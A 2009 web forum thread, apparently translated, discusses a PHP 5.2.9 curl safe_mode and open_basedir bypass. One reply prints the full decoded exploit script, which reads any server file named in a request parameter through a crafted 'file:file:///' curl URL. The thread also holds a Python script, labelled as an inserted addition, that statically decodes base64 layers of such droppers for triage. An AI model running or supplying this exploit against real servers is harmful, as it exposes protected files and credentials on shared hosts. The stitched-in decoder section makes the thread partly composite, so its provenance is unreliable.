PHP 5.2.9 curl safe_mode & open_basedir bypass


trash.metal.attack
04-11-2009, 03:03 PM
Whoa, I was just about to start learning on localhost with PHP 5.2.9, and when I opened rootsecure.net this was already there:
http://securityreason.com/achievement_securityalert/61
Exploit:
http://securityreason.com/achievement_exploitalert/11

By the way, does anyone know what encryption he used? I want to try decrypting it... I'm confused, I want to see the exploit script... $freiheit=fopen('./cx529.php', 'w'); :nokomen:

petunia
04-16-2009, 06:51 AM
It's really obvious, isn't it? It says base64 right there.
<?php
/*
safe_mode and open_basedir Bypass PHP 5.2.9
by Maksymilian Arciemowicz http://securityreason.com/
cxib [ a.T] securityreason [ d0t] com

NOTE:
http://securityreason.com/achievement_securityalert/61

EXPLOIT:
http://securityreason.com/achievement_exploitalert/10
*/

if(!empty($_GET['file'])) $file=$_GET['file'];
else if(!empty($_POST['file'])) $file=$_POST['file'];

echo '<PRE><P>This is exploit from <a
href="http://securityreason.com/" title="SecurityAudit">Security Audit - SecurityReason</a> labs.
Author : Maksymilian Arciemowicz
<p>Script for legal use only.
<p>PHP 5.2.9 safe_mode & open_basedir bypass
<p>More: <a href="http://securityreason.com/">SecurityReason</a>
<p><form name="form" action="http://'.$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["SCRIPT_NAME"]).$_SERVER["PHP_SELF"].'" method="post"><input type="text" name="file" size="50" value="'.htmlspecialchars($file).'"><input type="submit" name="hardstylez" value="Show"></form>';


$level=0;

if(!file_exists("file:"))
    mkdir("file:");
chdir("file:");
$level++;

$hardstyle = explode("/", $file);

for($a=0;$a<count($hardstyle);$a++){
    if(!empty($hardstyle[$a])){
        if(!file_exists($hardstyle[$a]))
            mkdir($hardstyle[$a]);
        chdir($hardstyle[$a]);
        $level++;
    }
}

while($level--) chdir("..");

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, "file:file:///".$file);

echo '<FONT COLOR="RED"> <textarea rows="40" cols="120">';

if(FALSE==curl_exec($ch))
    die('>Sorry... File '.htmlspecialchars($file).' doesnt exists or you dont have permissions.');

echo ' </textarea> </FONT>';

curl_close($ch);

?>
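
The base64 decoding discussed in the posts above can be done without running the file. The following Python script is an added example, not part of the original thread: it statically extracts the string literals passed to base64_decode() in a PHP file, follows nested layers, and reports which strings from the decoded script above appear in each layer. The sample is constructed: only its fopen() line is quoted in the thread, and the fwrite()/base64_decode() line and all function names are assumptions.

```python
import base64
import binascii
import re

# Literal passed to base64_decode('...') or base64_decode("...")
B64_CALL = re.compile(r"base64_decode\s*\(\s*(['\"])([A-Za-z0-9+/=\s]+)\1", re.I)

# Strings taken from the decoded script in this thread, used as triage markers.
MARKERS = (b'mkdir("file:")', b"file:file:///", b"CURLOPT_URL")


def decode_layers(php_source: bytes, max_depth: int = 5):
    """Statically decode base64_decode() literals, following nested layers.

    Returns a list of (depth, decoded_bytes); nothing is executed or written.
    """
    found = []
    queue = [(1, php_source)]
    while queue:
        depth, blob = queue.pop(0)
        for match in B64_CALL.finditer(blob.decode("latin-1")):
            literal = re.sub(r"\s+", "", match.group(2))
            try:
                decoded = base64.b64decode(literal, validate=True)
            except (binascii.Error, ValueError):
                continue  # not valid base64: leave it for manual review
            found.append((depth, decoded))
            if depth < max_depth:
                queue.append((depth + 1, decoded))
    return found


def markers_in(decoded: bytes):
    """Return the triage markers present in one decoded layer."""
    return [m for m in MARKERS if m in decoded]


# Constructed sample. Only the fopen() line is quoted in the thread; the
# fwrite()/base64_decode() line is an assumption about the dropper's shape.
INNER = b'<?php curl_setopt($ch, CURLOPT_URL, "file:file:///".$file); ?>'
SAMPLE = (
    b"<?php\n$freiheit=fopen('./cx529.php', 'w');\n"
    b"fwrite($freiheit, base64_decode('" + base64.b64encode(INNER) + b"'));\n?>"
)

if __name__ == "__main__":
    for depth, layer in decode_layers(SAMPLE):
        print(f"layer {depth}: {len(layer)} bytes, markers={markers_in(layer)}")
        print(layer.decode("latin-1"))
```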

trash.metal.attack
04-19-2009, 02:32 PM
Wow, thanks a lot... so that's how you view it.. :madesu: